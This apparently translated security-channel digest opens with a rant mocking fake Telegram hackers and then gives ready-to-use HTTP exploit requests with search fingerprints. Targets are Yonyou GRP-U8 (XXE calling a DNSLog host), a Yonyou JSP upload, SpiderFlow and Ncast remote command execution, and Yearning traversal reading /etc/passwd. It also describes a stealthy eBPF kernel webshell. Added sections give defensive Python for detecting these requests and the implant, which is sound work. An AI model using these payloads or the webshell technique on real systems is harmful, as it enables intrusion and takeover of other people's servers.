A summary of the classic Telegram money-grab "big-shot hacker" playbook; anyone matching the following can basically be blacklisted on sight
First, they act arrogant in group chats, describe themselves as top-tier technical talent, and every so often drop a line like "just popped another e-commerce site" / "just owned a gambling site" / "selling the xxx database dump" / "selling a universal xxx 0day". Then come the money-grab ads and a bio along the lines of "professional team" / "first-hand xxx" / "all-talk types don't bother me" / "idiots fishing for free tests, get lost" / "no middlemen"
They contribute nothing to any concrete technical discussion (they can't keep up), but the moment someone posts a broad, summary-level remark they jump in and start showing off: "just a WAF? I've bypassed loads of those", "I've hit a few sites like this before", "I've got this site's full database, I'd just hit it with a 0day", "just got into the intranet of a big state-owned enterprise", "back when I was hitting gov sites", blah blah. The avatar is usually the classic black background, hooded figure, Anonymous mask, Kali logo and so on. Very hacker
Then ask them a couple of technical questions and they crack: first they Baidu a few terms and recite buzzwords, and once they're called out they start saying they "focus on real-world ops". The slightly better ones will at this point pull out a few well-worn CMS admin panel screenshots or some flashy terminal screenshots, claim they've owned a pile of xxxx, "don't know theory but 👴🏻 can still pop sites". Ask for something concrete, like defacing a page or posting proof of access, and the hacker starts to lose it: the usual "idiot", "moron", "brain-dead", "your mum's dead", "f*** your mum" and so on, frantic and hopping mad, always good for a sudden laugh from everyone 🤓
In the final stage, when the hacker can't take the grilling any more, they look for an excuse to escape. Classic lines: "those who know, know", "I'm the best regardless, if you don't think so that's on you, you're an idiot", "I'm already kept by a bookmaker boss, I don't need your pocket change", "not wasting time on an idiot like you", "arguing with trash like you lowers my standing", and then they exit at light speed posing as an untouchable hacker god who can't be bothered with mere mortals. Two days later you find the "very busy" hacker chatting away again in some group next door 🤣
Yonyou (用友) GRP-U8 ufgovbank XXE vulnerability
Fingerprint: app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
A lookup showing up on the DNSLog platform means the target is vulnerable
Yonyou (用友) Mobile Management Platform uploadIcon arbitrary file upload vulnerability
POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Content-Length: 184
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
SL-CE-SUID: 15

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="c0fig.jsp"

<% out.println("123");%>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
The response shows the path of the uploaded file
SpiderFlow crawler platform remote command execution vulnerability (CVE-2024-0195)
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&noscript=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
A ping lookup arriving at the DNS platform confirms the vulnerability
Yearning front arbitrary file read vulnerability
Fingerprint: app="Yearning"
GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
A new kind of kernel-level webshell
No process, no port, no file (the file can be deleted after injection); executing a command does not spawn a new shell process, so conventional behavioural detection does not catch it
The WebShell is injected into the kernel, so conventional memory scanning does not catch it; the kernel implant can be adapted to every protocol, not just HTTP
It uses eBPF to hook ingress/egress traffic and filter out specific malicious commands, then hooks execve and similar functions to replace commands legitimately executed by other processes with the malicious ones, which gives the effect of a WebShell
Project: https://github.com/veo/ebpf_shell
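A defender-side counterpart to the post above, added here as an example and not taken from the ebpf_shell project: triage of `bpftool prog show -j` output for the implant shape it describes (a traffic-hooking program plus an execve-hooking program, with no user-space owner once the loader has exited and removed its file). The sample output is constructed; the field names follow bpftool's JSON output (`id`, `type`, `name`, `tag`, `uid`, `pids`) and the values are invented for illustration. The `KNOWN_PREFIXES` allowlist is hypothetical.

```python
# Added example (not from the ebpf_shell project): triage of `bpftool prog show -j`
# output for the pattern described above: a traffic hook plus an execve hook,
# neither held open by any user-space process.
import json

# Program types that can sit on the packet path (where ebpf_shell reads commands)
TRAFFIC_TYPES = {"sched_cls", "sched_act", "xdp", "socket_filter", "cgroup_skb", "sk_skb", "sk_msg"}
# Program types that can hook execve and friends (where it swaps the command)
EXEC_HOOK_TYPES = {"kprobe", "tracepoint", "raw_tracepoint", "tracing", "lsm"}
# Hypothetical allowlist of name prefixes for eBPF tooling you know is deployed
KNOWN_PREFIXES = ("cil_", "tail_", "tracee_", "falco_")

# Constructed sample of `bpftool prog show -j`; values are invented.
SAMPLE_BPFTOOL_JSON = json.dumps([
    {"id": 12, "type": "cgroup_skb", "name": "cil_from_container", "tag": "0f1e2d3c4b5a6978",
     "uid": 0, "pids": [{"pid": 812, "comm": "cilium-agent"}]},
    {"id": 40, "type": "sched_cls", "name": "tc_ingress", "tag": "aa11bb22cc33dd44", "uid": 0},
    {"id": 41, "type": "kprobe", "name": "hook_execve", "tag": "55ee66ff77008899", "uid": 0},
    {"id": 55, "type": "tracepoint", "name": "tracee_openat", "tag": "1234567890abcdef",
     "uid": 0, "pids": [{"pid": 1034, "comm": "tracee"}]},
])


def triage(bpftool_json: str) -> dict:
    """Return the orphaned, unrecognised programs and whether they form the
    traffic-hook + execve-hook pair the ebpf_shell technique needs."""
    progs = json.loads(bpftool_json)
    # No owning process: the program is kept alive by a bpffs pin or a leaked fd,
    # which is exactly the "no process" state the implant advertises.
    orphans = [p for p in progs if not p.get("pids")]
    unknown = [p for p in orphans if not p["name"].startswith(KNOWN_PREFIXES)]
    traffic = [p["id"] for p in unknown if p["type"] in TRAFFIC_TYPES]
    # Name-based check only: the name is the implant author's own function name,
    # so treat this as a first pass, not proof.
    exec_hooks = [p["id"] for p in unknown
                  if p["type"] in EXEC_HOOK_TYPES and "exec" in p["name"].lower()]
    return {
        "orphan_unknown": [p["id"] for p in unknown],
        "traffic_hooks": traffic,
        "exec_hooks": exec_hooks,
        "ebpf_shell_pattern": bool(traffic and exec_hooks),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_BPFTOOL_JSON), indent=2))
```

Feed it live data with `bpftool prog show -j`, then confirm what each flagged program is attached to with `bpftool link show` (on recent kernels) and whether it is pinned with `ls /sys/fs/bpf`. The `pids` field is only emitted by bpftool builds with BPF iterator support running as root; without it every program looks orphaned and the allowlist does all the work, so expect to tune it per host.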
CVE-2024-0305 Ncast (盈可视) HD Smart Recording System busiFacade RCE vulnerability
Fingerprint: app="Ncast-产品" && noscript=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
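A detection pass over the five PoC shapes posted above (GRP-U8 XXE, the Yonyou upload, SpiderFlow CVE-2024-0195, the Yearning file read and Ncast CVE-2024-0305), added here as an example and not code from the channel or any vendor. The sample requests are constructed from those PoCs with hosts replaced by `target` and the one-off DNSLog tokens by `example.dnslog.invalid`; the `benign_function_save` request is invented as a control. Each rule keys on what the application sees after a single URL-decode, which is why the `%5c` traversal and the `%7D...%7B` brace escape are caught without per-product signatures.

```python
# Added example (not from the channel or any vendor): one detection pass over raw
# HTTP requests for the PoC shapes above. Sample requests are constructed.
import json
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

SAMPLES = {
    "grp_u8_xxe": (
        "POST /ufgovbank HTTP/1.1\r\nHost: target\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        'reqData=<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://example.dnslog.invalid">'
        "&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest"
    ),
    "yonyou_upload": (
        "POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1\r\n"
        "Host: target\r\nContent-Type: multipart/form-data; boundary=----X\r\n\r\n"
        '------X\r\nContent-Disposition: form-data; name="file"; filename="c0fig.jsp"\r\n\r\n'
        '<% out.println("123");%>\r\n------X--'
    ),
    "spiderflow_rce": (
        "POST /function/save HTTP/1.1\r\nHost: target\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "id=1&name=cmd&parameter=rce&noscript=%7DJava.type('java.lang.Runtime')"
        ".getRuntime().exec('ping+example.dnslog.invalid')%3B%7B"
    ),
    "yearning_read": (
        "GET /front/%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1\r\nHost: target\r\n\r\n"
    ),
    "ncast_rce": (
        "POST /classes/common/busiFacade.php HTTP/1.1\r\nHost: target\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,"
        "%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D"
    ),
    "benign_function_save": (  # invented control request
        "POST /function/save HTTP/1.1\r\nHost: target\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "id=1&name=add&parameter=a,b&noscript=return+a%2Bb%3B"
    ),
}

# One pattern per PoC shape, matched against attacker-controlled surfaces
# after a single URL-decode (the form the application sees).
EXTERNAL_DTD = re.compile(r'<!(?:DOCTYPE|ENTITY)\s+\S+\s+(?:SYSTEM|PUBLIC)\s+"', re.I)
DOT_DOT_SEP = re.compile(r"\.\.[\\/]")  # "../" and "..\" (the Yearning PoC sends %5c)
SCRIPT_ENGINE = re.compile(r"Java\.type\(|java\.lang\.Runtime|ProcessBuilder")
SERVER_SIDE_EXT = re.compile(r'filename="[^"]*\.(?:jspx?|php\d?|aspx?)"', re.I)
SHELL_META = re.compile(r"[|;&`$]")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, percent-encoded path, query, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path,
            "query": parse_qs(url.query, keep_blank_values=True),
            "headers": headers, "body": body}


def controlled_surfaces(req: dict):
    """Yield every attacker-controlled string, decoded once."""
    yield unquote_plus(req["path"])
    for values in req["query"].values():
        yield from values  # parse_qs already decoded these
    yield unquote_plus(req["body"])


def detect(raw: str) -> list:
    req = parse_request(raw)
    surfaces = list(controlled_surfaces(req))
    hits = []
    if any(EXTERNAL_DTD.search(s) for s in surfaces):
        hits.append("xxe-external-dtd")
    if any(DOT_DOT_SEP.search(s) for s in surfaces):
        hits.append("path-traversal")
    if any(SCRIPT_ENGINE.search(s) for s in surfaces):
        hits.append("script-engine-rce")
    if ("multipart/form-data" in req["headers"].get("content-type", "")
            and SERVER_SIDE_EXT.search(req["body"])):
        hits.append("server-side-script-upload")
    if req["path"].endswith("/busiFacade.php"):
        try:
            call = json.loads(unquote_plus(req["body"]))
        except ValueError:
            call = {}
        if any(SHELL_META.search(str(p)) for p in call.get("param", [])):
            hits.append("busifacade-command-injection")
    return hits


def scan_all(samples: dict = SAMPLES) -> dict:
    return {name: detect(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name:24s} {hits or ['clean']}")
```

The rules are deliberately generic (external DTD, `..` plus a separator, script-engine class names, server-side extensions in multipart uploads, shell metacharacters in a busiFacade `param`), so they also cover variants of these PoCs that swap the DNSLog domain or the uploaded filename; tune `SERVER_SIDE_EXT` and `SHELL_META` to the stack you actually run behind the proxy.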